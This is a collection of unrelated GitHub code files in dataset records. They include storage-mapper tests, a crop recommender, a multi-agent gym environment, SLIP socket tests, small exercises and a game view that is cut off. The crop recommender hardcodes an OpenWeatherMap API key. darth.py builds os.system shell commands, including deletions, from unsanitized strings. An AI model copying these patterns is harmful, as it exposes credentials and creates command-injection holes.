mocker.patch('mail.payments.payments.storage.mappers.arbitrage.func.now', mocker.Mock(return_value=now))\n return now\n\n @pytest.mark.asyncio\n async def test_get(self, arbitrage, storage):\n from_db = await storage.arbitrage.get(arbitrage.arbitrage_id)\n assert from_db == arbitrage\n\n @pytest.mark.asyncio\n async def test_get_by_escalate_id(self, arbitrage, storage):\n from_db = await storage.arbitrage.get_by_escalate_id(arbitrage.escalate_id)\n assert from_db == arbitrage\n\n @pytest.mark.parametrize('field', ('chat_id', 'arbiter_chat_id', 'escalate_id', 'status'))\n @pytest.mark.asyncio\n async def test_find(self, field, arbitrage, storage):\n from_db = await alist(storage.arbitrage.find(filters={field: getattr(arbitrage, field)}))\n assert from_db == [arbitrage]\n\n @pytest.mark.parametrize('field', ('chat_id', 'arbiter_chat_id', 'escalate_id', 'status'))\n @pytest.mark.asyncio\n async def test_save(self, field, arbitrage, storage, rands, randitem, now):\n setattr(arbitrage, field, randitem(ArbitrageStatus) if field == 'status' else rands())\n await storage.arbitrage.save(arbitrage)\n from_db = await storage.arbitrage.get(arbitrage.arbitrage_id)\n assert from_db == arbitrage\n\n @pytest.mark.asyncio\n async def test_ignore_created_during_save(self, arbitrage, storage):\n arbitrage.created = utcnow()\n await storage.arbitrage.save(arbitrage)\n from_db = await storage.arbitrage.get(arbitrage.arbitrage_id)\n assert from_db.created != arbitrage.created\n\n @pytest.mark.asyncio\n async def test_get_current(self, storage, arbitrage):\n returned = await storage.arbitrage.get_current(arbitrage.uid, arbitrage.order_id)\n assert arbitrage == returned\n\n @pytest.mark.asyncio\n async def test_get_by_refund_id(self, refund, storage, arbitrage):\n returned = await storage.arbitrage.get_by_refund_id(arbitrage.uid, arbitrage.refund_id)\n assert arbitrage == returned\n\n @pytest.mark.asyncio\n async def test_no_get_current_via_status(self, storage, arbitrage):\n arbitrage.status = ArbitrageStatus.COMPLETE\n arbitrage = await storage.arbitrage.save(arbitrage)\n assert await storage.arbitrage.get_current(arbitrage.uid, arbitrage.order_id) is None\n\n @pytest.mark.asyncio\n async def test_no_get_current_via_absent(self, storage, order):\n assert await storage.arbitrage.get_current(order.uid, order.order_id) is None\n\n @pytest.mark.asyncio\n async def test_delete(self, storage, arbitrage):\n await 
storage.arbitrage.get(arbitrage.arbitrage_id)\n await storage.arbitrage.delete(arbitrage)\n\n with pytest.raises(Arbitrage.DoesNotExist):\n await storage.arbitrage.get(arbitrage.arbitrage_id)\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/unit/storage/mappers/test_arbitrage.py","file_name":"test_arbitrage.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"41734749435","text":"\"\"\"Description\nMiguelito really likes numerical series and decided to create one with his own name. The first value of Miguelito's series is 3, and each new number is generated by adding alternately 4 and 1 to the previous value, as in the example below:\n\n3 7 8 12 13 17 18 22 23 27 ...\n\nWrite a recursive function called SerieMiguelito that receives as input the index of the element in the sequence and returns its value.\n\nInput format\n\nAn integer\n\nOutput format\n\nAn integer\"\"\"\n\n\ndef Serie_de_Miguelito (indice):\n\n lista_serie_Miguelito = [3]\n SOMA_1 = 1\n SOMA_4 = 4\n \n for i in range (indice-1):\n termo_MIguelito = lista_serie_Miguelito[i]\n\n if i % 2 != 0:\n lista_serie_Miguelito.append(termo_MIguelito+SOMA_1)\n else:\n lista_serie_Miguelito.append(termo_MIguelito+SOMA_4)\n \n return (print(lista_serie_Miguelito[indice-1]))\n\n\nindice = int (input())\n\nSerie_de_Miguelito(indice)","repo_name":"Andreza-S/Codando","sub_path":"códigos python/Serie de Miguelito.py","file_name":"Serie de Miguelito.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"4232668487","text":"import os\n\ndef darth(accession, contigs_filename, s3, s3_folder, outputBucket, has_reads = False):\n os.system(\"mkdir -p /serratus-data/\" +accession +\".darth\")\n os.chdir(\"/serratus-data/\" + accession + \".darth\")\n reads = ('/serratus-data/' +accession+\".fastq\") if has_reads else \"none\"\n os.system(' '.join([\"darth.sh\",accession,'/serratus-data/' + contigs_filename, reads, '/darth', \"/serratus-data/\" + accession + \".darth\",str(8)]))\n try:\n s3.upload_file(\"pfam/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.pfam.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n s3.upload_file(\"pfam/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n except:\n print(\"cannot upload\", accession + \".darth/pfam/alignments.fasta\",flush=True)\n try:\n s3.upload_file(\"transeq/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.transeq.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n s3.upload_file(\"transeq/alignments.fasta\", outputBucket, s3_folder + contigs_filename + \".darth.alignments.fasta\", ExtraArgs={'ACL': 'public-read'})\n except:\n print(\"cannot upload\", accession + \".darth/transeq/alignments.fasta\",flush=True)\n os.chdir(\"/serratus-data/\")\n os.system(\"tar -zcvf \"+ accession + \".darth.tar.gz \" + accession + \".darth\")\n s3.upload_file(accession + \".darth.tar.gz\", outputBucket, s3_folder + contigs_filename + \".darth.tar.gz\", ExtraArgs={'ACL': 'public-read'})\n os.system(\"rm -Rf \"+accession+\".darth/read-analysis\")\n os.system(\"tar -zcvf \"+ accession + \".darth.stripped.tar.gz \" + accession + \".darth\")\n s3.upload_file(accession + \".darth.stripped.tar.gz\", outputBucket, s3_folder + contigs_filename + 
\".darth.stripped.tar.gz\", ExtraArgs={'ACL': 'public-read'})\n # to verify which file darth was run on \n os.system(\"md5sum \" + contigs_filename+ \" > \" + accession + \".darth.input_md5\")\n s3.upload_file(accession + \".darth.input_md5\", outputBucket, s3_folder + contigs_filename + \".darth.input_md5\", ExtraArgs={'ACL': 'public-read'})\n\n","repo_name":"serratus-bio/serratus-batch-assembly","sub_path":"src/darth.py","file_name":"darth.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1436838420","text":"class Solution:\n def totalFruit(self, fruits: List[int]) -> int:\n N = len(fruits)\n lo, ans = 0, 0\n curr = defaultdict(int)\n for hi in range(N):\n curr[fruits[hi]] += 1\n if len(curr) <= 2: ans = max(ans, hi-lo+1)\n while len(curr) > 2:\n curr[fruits[lo]] -= 1\n if curr[fruits[lo]] == 0:\n curr.pop(fruits[lo])\n lo += 1\n return ans\n","repo_name":"henryliuser/hliu-cp","sub_path":"leetcode/medium/fruits_into_baskets.py","file_name":"fruits_into_baskets.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"38760873649","text":"# Importing libraries\nimport requests\nimport json\nimport pandas as pd\nimport numpy as np \nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\nfrom sklearn import tree\nimport warnings\nimport csv\nwarnings.filterwarnings('ignore')\n\n\"\"\"inputfile=open('soil_comp.json','r')\ninputdata=inputfile.read()\nobj=json.loads(inputdata)\nN=obj['N']\nP=obj['P']\nK=obj['K']\nPh=obj['Ph']\n\"\"\"\n\nglobal NaiveBayes\n\ncropRecommend='utils/data/Crop_recommendation.csv'\nmodelpkl = 'models/NBClassifier.pkl'\ntestsoilcomp = 'utils/data/test_with_soil_comp.csv'\nbioFertilizers = 'utils/data/bio_fertilizers.csv'\n \ndef train():\n df = pd.read_csv(cropRecommend)\n df['label'].unique()\n features = df[['N', 'P', 'K', 'temperature', 'humidity', 'ph', 'rainfall']]\n target = df['label']\n # features = df[['temperature', 'humidity', 'ph', 'rainfall']]\n labels = df['label']\n # Initialzing empty lists to append all model's name and corresponding name\n acc = []\n model = []\n # Splitting into train and test data\n\n from sklearn.model_selection import train_test_split\n Xtrain, Xtest, Ytrain, Ytest = train_test_split(features, target, test_size=0.2, random_state=2)\n\n from sklearn.naive_bayes import GaussianNB\n\n NaiveBayes = GaussianNB()\n\n NaiveBayes.fit(Xtrain, Ytrain)\n\n import pickle\n # Dump the trained Naive Bayes classifier with Pickle\n NB_pkl_filename = modelpkl\n # Open the file to save as pkl file\n NB_Model_pkl = open(NB_pkl_filename, 'wb')\n pickle.dump(NaiveBayes, NB_Model_pkl)\n # Close the pickle instances\n NB_Model_pkl.close()\n return NaiveBayes\n\ndef pred_crop(N,P,K,Ph,lat,long,NaiveBayes):\n \"\"\"N = input(\"Enter the Nitrogen \")\n P = input(\"Enter the phosphorous \")\n K = input(\"Enter the potassium \")\n Ph = input(\"Enter the PH value \")\n\n lat = input('lat')\n long = input('long')\"\"\"\n\n BASE_URL = \"https://api.openweathermap.org/data/2.5/onecall?\"\n url = BASE_URL + \"lat=\" + lat + \"&lon=\" + long + \"&appid=d4052e83125817ea8f211eeafa15c47d\"\n\n headers = {\n 'x-rapidapi-key': \"d4052e83125817ea8f211eeafa15c47d\"\n }\n response = requests.request(\"GET\", url, headers=headers)\n x = response.json()\n\n current = x[\"current\"]\n try:\n current_rain = current[\"rain\"]\n rainfall = 
current_rain[\"1h\"]\n except:\n rainfall = 0\n\n temp = current[\"temp\"] - 273.15\n temp = \"{:.2f}\".format(temp)\n humidity = current[\"humidity\"]\n\n with open(testsoilcomp, 'w', newline='') as csvfile:\n fieldnames = ['N',\n 'P', 'K',\n 'temperature', 'humidity', 'ph', 'rainfall']\n\n thewriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n thewriter.writeheader()\n\n thewriter.writerow({'N': N,\n 'P': P, 'K': K,\n 'temperature': temp, 'humidity': humidity, 'ph': Ph, 'rainfall': rainfall})\n\n x_test = pd.read_csv(testsoilcomp)\n prediction = NaiveBayes.predict(x_test)\n # print(prediction[0])\n pred = prediction[0]\n\n df = pd.read_csv(bioFertilizers)\n\n Bio_fertilizer = df[df['Crop'] == pred]['Bio_fertilizer'].iloc[0]\n Intercrop = df[df['Crop'] == pred]['Intercrop'].iloc[0]\n\n\n data = {\n \"predicted_crop\": pred,\n \"biofertilizer\": Bio_fertilizer,\n \"Intercrop\": Intercrop,\n\n }\n return data\n\n\n\ndef crop_recommendation(N,P,K,Ph,lat,lon):\n model = train()\n data = pred_crop(N,P,K,Ph,lat,lon,model)\n return data\n\n","repo_name":"mansigupta163/AI-Agventure","sub_path":"utils/crop_recommendation.py","file_name":"crop_recommendation.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
{"seq_id":"28345123709","text":"import constants\nimport random\nimport numpy as np\nimport gym\nfrom gym.spaces import Box\nfrom pprint import PrettyPrinter\nimport copy\nimport pandas as pd\nfrom gamelogic import HoneyCombGame\nfrom collections import defaultdict\nfrom typing import Tuple\n\n\nclass HoneyCombEnv(gym.Env):\n \"\"\"\n The HoneyComb Game:\n The parameters of the game are set in the constants.py file.\n Several agents are positioned on a hexagonal playing field, where there\n are 7 actions available to them, i.e., moving to an adjacent field (6 actions)\n and a void action (1 action) that allows them to stay on the current field.\n The agents receive a reward for terminating the game on one of 6 reward fields\n located at the edges of the playing field.\n NUM_INFORMED agents (biased agents) are aware of a special payoff field, that increases their reward\n by a factor of 2.\n The agent's state is returned as a numpy vector, containing the positions of all\n agents as well as the distance to the reward fields. 
The biased agents are additionally aware of the \n special payoff field.\n Actions are submitted as a numpy array of integers, where the integer at index i coresponds to agent\n i's action.\n \"\"\"\n\n # NOTE: The make_states, step and compute_rewards functions have been adjusted to fit their code\n\n def __init__(\n self,\n max_turns: int = 15,\n alternative_states: int = True\n ):\n\n self.use_alternative_states = alternative_states\n self.agents = constants.NUM_UNINFORMED + constants.NUM_INFORMED\n self.action_space = self.agents * [gym.spaces.Discrete(7)]\n obs_dim = self.agents * 2 + len(constants.PAYOFF_LOCATIONS) * 2 + 2 + 1\n self.observation_space = self.agents * [Box(-np.inf, np.inf, shape=(obs_dim,))]\n self.num_informed = constants.NUM_INFORMED\n self.max_turns = max_turns\n self.game = HoneyCombGame(self.agents, max_turns)\n self.done = False\n\n # Call reset here to initialize gamefield\n self.reset()\n\n def step(self, actions: np.ndarray) -> Tuple[np.ndarray, np.ndarray, bool, str]:\n \"\"\"\n Implementation of the agent-environment interaction.\n Performs one time step of environment dynamics.\n :param actions: an action provided by the agent (one-hot index)\n :return: state, rewards, done, info\n \"\"\"\n\n int_actions = [np.where(r == 1)[0][0] for r in np.vstack(actions)]\n for agent in range(self.agents):\n action = int_actions[agent]\n valid_move = self.game.submit_move_for_agent(\n agent, constants.ACTIONS[action]\n )\n\n self.turns_count += 1\n done = np.array([False] * self.agents).reshape(1, -1)\n\n if self.game.check_all_arrived() or self.turns_count >= self.max_turns:\n if self.game.check_all_arrived():\n print(\"reached goals after %i \" % self.turns_count)\n done = np.array([True] * self.agents).reshape(1, -1)\n\n rewards = self.compute_reward(done)\n\n if self.use_alternative_states:\n states = self.make_alternative_states()\n else:\n states = self.make_states()\n\n return states, rewards, done, {\"Not Implemented\": \"\"}\n\n # At the end of an episode call reset_game\n def reset(self) -> np.ndarray:\n \"\"\"\n At the end of an episode call reset to initialize a new playing field.\n :return: current state\n \"\"\"\n # Initialize a new gamefield\n self.game.reset_game()\n self.turns_count = 0\n\n self.payoff_fields = constants.PAYOFF_LOCATIONS\n self.special_payoff_fields = random.sample(self.payoff_fields, 1)\n\n return self.make_alternative_states()\n\n def compute_reward(self, done: np.ndarray) -> np.ndarray:\n \"\"\"\n Compute the rewards for each agent.\n :done: Array indicating the done status for each agent\n :return: rewards\n \"\"\"\n rewards = [0.0 for i in range(self.agents)]\n rewarded_fields = defaultdict(float)\n if done[0][0]:\n # Get rewards for all rew fields with agents on\n for agent in range(self.agents):\n pos = self.game.get_agent_pos(agent)\n if pos in self.payoff_fields:\n rewarded_fields[pos] += 1.0\n\n for agent in range(self.agents):\n pos = self.game.get_agent_pos(agent)\n rewards[agent] += rewarded_fields.get(pos, 0.0)\n if agent < self.num_informed and pos in self.special_payoff_fields:\n rewards[agent] *= 2\n\n rewards = np.array(rewards).reshape(1, -1)\n return rewards\n\n def make_states(self) -> np.ndarray:\n \"\"\"\n Reflects the current state of the environment, as seen by each agent.\n :return: array with states for all agents\n \"\"\"\n state = []\n for agent in range(self.agents):\n r, c = self.game.get_agent_pos(agent)\n state.append(r)\n state.append(c)\n for field in constants.PAYOFF_LOCATIONS:\n r, c = field\n 
state.append(r)\n state.append(c)\n state.append(self.turns_count)\n for field in self.special_payoff_fields:\n r, c = field\n state.append(r)\n state.append(c)\n\n informed_state = np.array(state)\n uninformed_state = copy.deepcopy(informed_state)\n uninformed_state[-2:] = 0\n\n states = [\n informed_state if i < self.num_informed else uninformed_state\n for i in range(self.agents)\n ]\n states = np.stack(states, axis=0)\n\n return states\n\n def make_alternative_states(self) -> np.ndarray:\n \"\"\"\n Reflects the current state of the environment, as seen by each agent.\n In this case, positions are normalised and distances to reward fields are \n reported rather than their position on the playing field.\n :return: array with states for all agents\n \"\"\"\n states = []\n for agent in range(self.agents):\n agent_state = []\n\n # Own distance\n r, c = self.game.get_agent_pos(agent)\n agent_state.append(r / 6)\n agent_state.append(c / 6)\n\n # Distances to others\n distances_r = [\n (r - pos[0]) / 12\n for key, pos in self.game.agent_positions.items()\n if key != agent\n ]\n distances_c = [\n (c - pos[1]) / 12\n for key, pos in self.game.agent_positions.items()\n if key != agent\n ]\n agent_state += distances_r\n agent_state += distances_c\n\n # Goal distances\n distances_goal_r = [(r - pos[0]) / 12 for pos in self.payoff_fields]\n distances_goal_c = [(c - pos[1]) / 12 for pos in self.payoff_fields]\n agent_state += distances_goal_r\n agent_state += distances_goal_c\n\n if agent < self.num_informed:\n agent_state.append((r - self.special_payoff_fields[0][0]) / 12)\n agent_state.append((c - self.special_payoff_fields[0][1]) / 12)\n else:\n agent_state += [0, 0]\n agent_state.append(self.max_turns - self.turns_count)\n states.append(np.array(agent_state))\n\n states = np.stack(states, axis=0)\n return states\n\n def render(self, **kwargs):\n \"\"\"\n Prints gamefield as matrix.\n :return: A numpy array containing the gamefield.\n \"\"\"\n return print(self.game.agent_positions)\n\n\nif __name__ == \"__main__\":\n env = HoneyCombEnv()\n for i in range(50):\n actions = [random.randint(0, 6) for i in range(10)]\n one_hot_actions = [np.array([0,0,0,0,0,0,0]) for i in actions]\n for i in range(len(actions)):\n one_hot_actions[i][actions[i]] = 1\n one_hot_actions = np.array(one_hot_actions)\n \n print(actions)\n print(one_hot_actions)\n env.render()\n state, rew, done, info = env.step(one_hot_actions)\n print(state[0])\n print(state[8])\n print(env.game.agent_positions)\n print(\"----------------\")\n","repo_name":"pauljpritz-zz/HoneyComb-Python-Environment","sub_path":"hc_env/honeycomb_env.py","file_name":"honeycomb_env.py","file_ext":"py","file_size_in_byte":8304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12127210639","text":"# -*- encoding: utf-8 -*-\n\n\"\"\"Program\n\n\n\n\"\"\"\n\n\nfrom typing import Optional\nfrom stool.stool import get_in_out_file_names\n\n\nDICTIONARY_PATH = r\"words_for_ai1.txt\"\nIN_FILE_NAME, OUT_FILE_NAME = get_in_out_file_names()\n\n\nwith open(DICTIONARY_PATH, 'r', encoding='UTF-8') as file:\n DICTIONARY = {phrase for phrase in file.read().split()}\n\n\ndef solve(input_file: str, output_file: str) -> None:\n def division_length(path: list[str]) -> int:\n return sum([len(phrase)**2 for phrase in path])\n\n def find_optimal_divisions(phrase: str, memo) -> Optional[list[str]]:\n if phrase in memo:\n return memo[phrase]\n if phrase in DICTIONARY:\n return [phrase]\n best_path = None\n # Find possible 
division points that can create meaningful words.\n division_indexes = [i for i in range(1, len(phrase) + 1) if phrase[:i] in DICTIONARY][::-1]\n if division_indexes:\n words, remainders = [phrase[:i] for i in division_indexes], [phrase[i:] for i in division_indexes]\n for word, remainder in zip(words, remainders):\n remainder_division = find_optimal_divisions(remainder, memo)\n if remainder_division is not None:\n result = [word] + remainder_division\n if best_path is None or division_length(result) > division_length(best_path):\n best_path = result\n memo[phrase] = result\n else:\n memo[phrase] = None\n\n return best_path\n\n with open(input_file, 'r', encoding='utf-8') as in_file, open(output_file, 'w', encoding='utf-8') as out_file:\n for line in in_file.read().split():\n out_file.write(' '.join(find_optimal_divisions(line, {})) + '\\n')\n\n\nif __name__ == '__main__':\n solve(IN_FILE_NAME, OUT_FILE_NAME)\n","repo_name":"mikiSpoko200/artificial-intelligence","sub_path":"sheet01/ex2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70513768872","text":"import csv\n\n\nclass ReadCSV(object):\n def __init__(self):\n self.knol = {}\n self.knol_ = {} # dictionary of columns of csv\n self.data = []\n self.data_ = []\n self.dot = None\n self.knol_all = {} # dict of dicts of knol\n\n @staticmethod\n def read_csv(directory, csv_name):\n path = directory + '/' + csv_name\n csv_f = open(path, 'rU')\n csv_obj = csv.reader(csv_f)\n return csv_name.split('.')[0], csv_obj\n\n def read_csv_contents(self, directory, csv_name):\n self.data = []\n self.data_ = []\n self.knol = {}\n self.knol_ = {}\n path = directory + '/' + csv_name\n csv_f = open(path, 'rU')\n f = csv.reader(csv_f)\n for i, row in enumerate(f):\n\n if i == 0:\n for j, heading in enumerate(row):\n self.knol[str(j) + '_' + heading] = None\n else:\n self.data.append(row)\n\n cols = len(self.data[0])\n cnt = 0\n\n while not cnt > cols - 1:\n temp = []\n for row in self.data:\n temp.append(row[cnt])\n self.data_.append(temp)\n cnt += 1\n\n for k, v in self.knol.iteritems():\n for i, lst in enumerate(self.data_):\n if i == int(k[0]):\n self.knol_[k[2:]] = lst\n self.knol_all[csv_name] = self.knol_","repo_name":"arunenigma/CSV_to_Block_Diagram_Generator","sub_path":"read_csv.py","file_name":"read_csv.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31112259548","text":"from multiprocessing import Pipe, Process\nimport socket\nfrom socketserver import TCPServer\nimport pytest\nfrom sliplib import SlipRequestHandler, SlipSocket\n\n\nclass SlipEchoHandler(SlipRequestHandler):\n \"\"\"SLIP request handler that echoes the received message, but with the bytes in reversed order.\"\"\"\n def handle(self):\n while True:\n message = self.request.recv_msg()\n if not message:\n break\n # Reverse the order of the bytes and send it back.\n data_to_send = bytes(reversed(message))\n self.request.send_msg(data_to_send)\n\n\nclass SlipEchoServer: # pylint: disable=too-few-public-methods\n \"\"\"Execution helper for the echo server. 
Sends the server address back over the pipe.\"\"\"\n\n server_data = {\n socket.AF_INET: (TCPServer, '127.0.0.1'),\n socket.AF_INET6: (type('TCPServerIPv6', (TCPServer,), {'address_family': socket.AF_INET6}), '::1'),\n }\n\n def __init__(self, address_family, pipe):\n server_class, localhost = self.server_data[address_family]\n self.server = server_class((localhost, 0), SlipEchoHandler)\n pipe.send(self.server.server_address)\n self.server.handle_request()\n\n\nclass SlipEchoClient:\n \"\"\"Client for the SLIP echo server\"\"\"\n def __init__(self, address):\n self.sock = SlipSocket.create_connection(address)\n\n def echo(self, msg):\n \"\"\"Send message to the SLIP server and returns the response.\"\"\"\n self.sock.send_msg(msg)\n return self.sock.recv_msg()\n\n def close(self):\n \"\"\"Close the SLIP socket\"\"\"\n self.sock.close()\n\n\nclass TestEchoServer:\n \"\"\"Test for the SLIP echo server\"\"\"\n @pytest.fixture(autouse=True, params=[socket.AF_INET, socket.AF_INET6])\n def setup(self, request, capfd):\n \"\"\"Prepare the server and client\"\"\"\n near, far = Pipe()\n address_family = request.param\n self.server = Process(target=SlipEchoServer, args=(address_family, far))\n self.server.start()\n address_available = near.poll(1.5) # AppVeyor sometimes takes a long time to run the server.\n if address_available:\n server_address = near.recv()\n else:\n captured = capfd.readouterr()\n pytest.fail(captured.err)\n self.client = SlipEchoClient(server_address)\n yield\n self.client.close()\n self.server.join()\n\n def test_echo_server(self):\n \"\"\"Test the echo server\"\"\"\n data = [\n (b'hallo', b'ollah'),\n (b'goodbye', b'eybdoog')\n ]\n for snd_msg, expected_reply in data:\n assert self.client.echo(snd_msg) == expected_reply\n","repo_name":"rhjdjong/SlipLib","sub_path":"tests/integration/test_server_client.py","file_name":"test_server_client.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"5286443802","text":"from collections import Counter, defaultdict, deque\nfrom string import ascii_uppercase\n\n\ndef findBestPath(s, t, ct, tc, listauxs, listauxt):\n # T ->\n #B - A\n #s - t\n\n # print(f'fs {s} - ft {t} - ct {ct}')\n\n count = 1\n dd = defaultdict(lambda: defaultdict(int))\n if t in ct[s]:\n # print(f't {t} in ct[s] {ct[s]}')\n return count\n # if len(ct[s]) == 0:\n # return -1\n # if len(tc[t]) == 0:\n # return -1\n else:\n results = deque()\n results.clear()\n for ssub in ct[s]:\n\n if ssub in listauxs and t in listauxt:\n continue\n # print(ssub, t)\n listauxs.append(ssub)\n listauxt.append(t)\n if not dd[ssub][t]:\n count2 = findBestPath(\n ssub, t, ct, tc, listauxs, listauxt)\n dd[ssub][t] = count2\n else:\n count2 = dd[ssub][t]\n\n results.append(count2)\n if len(results) > 0:\n if len(list(filter(lambda x: x != -1, results))) > 0:\n mini = min(filter(lambda x: x != -1, results))\n count = mini+count\n print(s, t, count)\n return(count)\n else:\n return(-1)\n else:\n return(-1)\n return(-1)\n\n\ndef consistency():\n # VOWELS = 'AEIOU'+'asdf'\n S = input()\n K = int(input())\n\n LL = deque()\n LA = deque()\n LT = deque()\n ct = defaultdict(str)\n tc = defaultdict(str)\n for i in (range(0, K)):\n LL.append(input())\n ct[LL[i][0]] = LL[i][1]+ct[LL[i][0]]\n tc[LL[i][1]] = LL[i][0]+tc[LL[i][1]]\n # LA.append(LL[i][0])\n # LT.append(LL[i][1])\n fullS = S\n # fullS = ascii_uppercase\n for s in tc:\n fullS += s\n countLetters = Counter(fullS).most_common()\n count = 
defaultdict(lambda: defaultdict(int))\n # print(findBestPath('A', 'Z', ct, tc))\n som = 0\n initial = 1\n results = deque()\n # c = findBestPath('O', 'X', {'N': 'XI', 'O': 'IE', 'E': 'W', 'F': 'NE', 'X': 'W', 'I': ''}, {\n # 'I': 'ON', 'E': 'FO', 'X': 'N', 'W': 'XE', 'N': 'F', 'F': '', 'O': ''})\n # return '1'\n for t in countLetters:\n som = 0\n for s in S:\n if t[0] == s:\n continue\n\n # count[t[0]][s] = findBestPath(s, t[0], ct, tc)\n # print(f'{s}-{t[0]}')\n c = findBestPath(s, t[0], ct, tc, deque(), deque())\n # print(f'{s}-{t[0]}=>c={c}')\n # print(f'tc={tc}')\n if c > 0:\n som += c\n else:\n som = -1\n break\n results.append(som)\n\n # print(i[0])\n # for k in (temp):\n # for i in (temp):\n # for j in temp[i]:\n # return('a')\n # return(results)\n x = list(filter(lambda x: x != -1, results))\n if len(x) == 0:\n result = -1\n else:\n result = min(x)\n return(result)\n\n\nfor case in range(int(input())):\n print(f'Case #{case+1}: {consistency()}')\n","repo_name":"irgot/FBHC","sub_path":"2021/Consistency C2.py","file_name":"Consistency C2.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"10531618124","text":"import requests\nimport csv\n\nlista = {}\ncount=0\nwith open('smart.csv', newline='') as csvread:\n\tcsvfile=csv.reader(csvread,delimiter=',')\n\t\n\tfor row in csvfile:\n\t\t#print(str(row[0]) +'works in the'+ str(row[1]) )\n\t\t#print(str(row))\n\t\t# row[0] is assumed to hold the image code and row[1] its URL\n\t\tlista[str(row[0])] = str(row[1])\n\t\tcount += 1\n\tprint('Processed '+ str(count) +' links.')\n\nprint(str(lista))\nprint('______________________________________________________________________________')\n\nprint(count)\nfor code in lista:\n\timagen = requests.get(lista[code]).content\n\twith open('c:/temp/DesFotos/Smartphones/' + code + '.jpg', 'wb') as handler:\n\t\thandler.write(imagen)\nprint('Process finished.')\n","repo_name":"Rex0747/pythonUtils","sub_path":"DescargaImagenes.py","file_name":"DescargaImagenes.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16362058722","text":"import arcade\nimport os\nimport math\n\nfrom entities.player_character import PlayerCharacter\nfrom helpers.constants import Constants\nfrom input.keys import Keys\nfrom entities.enemies.robot import RobotEnemy\nfrom entities.enemies.zombie import ZombieEnemy\n\n\nclass GameView(arcade.View):\n\n def __init__(self):\n super().__init__()\n\n file_path = os.path.dirname(os.path.abspath(__file__))\n os.chdir(file_path)\n\n self.handle_input = Keys()\n\n self.left_pressed = False\n self.right_pressed = False\n self.up_pressed = False\n self.down_pressed = False\n self.shoot_pressed = False\n self.jump_needs_reset = False\n\n self.tile_map = None\n self.scene = None\n self.player_sprite = None\n self.physics_engine = None\n self.camera = None\n self.gui_camera = None\n\n self.end_of_map = 0\n self.score = 0\n self.can_shoot = False\n self.shoot_timer = 0\n\n self.collect_coin_sound = arcade.load_sound(\n \":resources:sounds/coin1.wav\")\n self.jump_sound = arcade.load_sound(\":resources:sounds/jump1.wav\")\n self.game_over = arcade.load_sound(\":resources:sounds/gameover1.wav\")\n self.shoot_sound = arcade.load_sound(\":resources:sounds/hurt5.wav\")\n self.hit_sound = arcade.load_sound(\":resources:sounds/hit5.wav\")\n\n def setup(self):\n self.camera = arcade.Camera(self.window.width, self.window.height)\n 
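# Comment added for clarity: the world camera scrolls with the player, while the separate GUI camera below stays fixed so the score overlay does not move.\n 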
self.gui_camera = arcade.Camera(self.window.width, self.window.height)\n\n map_name = \":resources:tiled_maps/map_with_ladders.json\"\n\n layer_options = {\n Constants.LAYER_NAME_PLATFORMS: {\n \"use_spatial_hash\": True\n },\n Constants.LAYER_NAME_MOVING_PLATFORMS: {\n \"use_spatial_hash\": True\n },\n Constants.LAYER_NAME_LADDERS: {\n \"use_spatial_hash\": True\n },\n Constants.LAYER_NAME_COINS: {\n \"use_spatial_hash\": True\n },\n }\n\n self.tile_map = arcade.load_tilemap(\n map_name, Constants.TILE_SCALING, layer_options)\n # Initiate New Scene with our TileMap, this will automatically add all layers\n # from the map as SpriteLists in the scene in the proper order.\n self.scene = arcade.Scene.from_tilemap(self.tile_map)\n\n self.score = 0\n self.can_shoot = True\n self.shoot_timer = 0\n\n # Create player\n self.player_sprite = PlayerCharacter()\n self.player_sprite.center_x = (\n self.tile_map.tile_width * Constants.TILE_SCALING * Constants.PLAYER_START_X\n )\n self.player_sprite.center_y = (\n self.tile_map.tile_height * Constants.TILE_SCALING * Constants.PLAYER_START_Y\n )\n self.scene.add_sprite(Constants.LAYER_NAME_PLAYER, self.player_sprite)\n\n self.end_of_map = self.tile_map.width * Constants.GRID_PIXEL_SIZE\n\n enemies_layer = self.tile_map.object_lists[Constants.LAYER_NAME_ENEMIES]\n\n for obj in enemies_layer:\n cartesian = self.tile_map.get_cartesian(obj.shape[0], obj.shape[1])\n enemy_type = obj.properties[\"type\"]\n if enemy_type == \"robot\":\n enemy = RobotEnemy()\n elif enemy_type == \"zombie\":\n enemy = ZombieEnemy()\n enemy.center_x = math.floor(\n (cartesian[0] * Constants.TILE_SCALING *\n self.tile_map.tile_width)\n )\n enemy.center_y = math.floor(\n (cartesian[1] + 1) *\n (Constants.TILE_SCALING * self.tile_map.tile_height)\n )\n\n if \"boundary_left\" in obj.properties:\n enemy.boundary_left 